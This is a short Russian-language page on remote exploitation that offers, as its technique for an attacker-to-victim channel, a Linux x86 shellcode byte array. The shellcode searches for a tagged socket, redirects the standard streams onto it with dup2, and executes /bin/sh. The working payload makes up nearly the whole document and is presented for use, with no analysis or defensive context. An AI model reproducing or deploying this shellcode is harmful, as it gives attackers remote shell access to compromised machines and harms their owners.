На данной странице обсуждаются некоторые вопросы удаленного эксплоитинга. А именно вопрос создания канала связи между атакующим и уязвимой машиной.
Нами предлагается следующая техника.
char shellcode[]=
"\x31\xC9\xB1\x04\xC1\xE1\x08\x51\x31\xDB\xB3\x0A\x31\xC0\xB0\x40"
"\x50\xB0\x04\x50\x8D\x44\x24\xF0\x50\x51\x89\xCA\x89\xE1\x81\xC4"
"\xF8\xFF\xFF\xFF\x31\xC0\xB0\x66\xCD\x80\xBE\x62\x6C\x61\x68\x39"
"\x34\x24\x74\x09\x81\xEC\xE8\xFF\xFF\xFF\x59\xE2\xCA\x31\xC0\xB0"
"\x3F\x31\xC9\x89\xD3\xCD\x80\x31\xC0\xB0\x3F\x31\xC9\x41\x89\xD3"
"\xCD\x80\x31\xC0\xB0\x3F\x31\xC9\x41\x41\x89\xD3\xCD\x80\xEB\x12"
"\x5B\xFE\x4B\x07\x31\xC0\x50\x53\x89\xE1\x31\xD2\x31\xC0\xB0\x0B"
"\xCD\x80\xE8\xE9\xFF\xFF\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x01";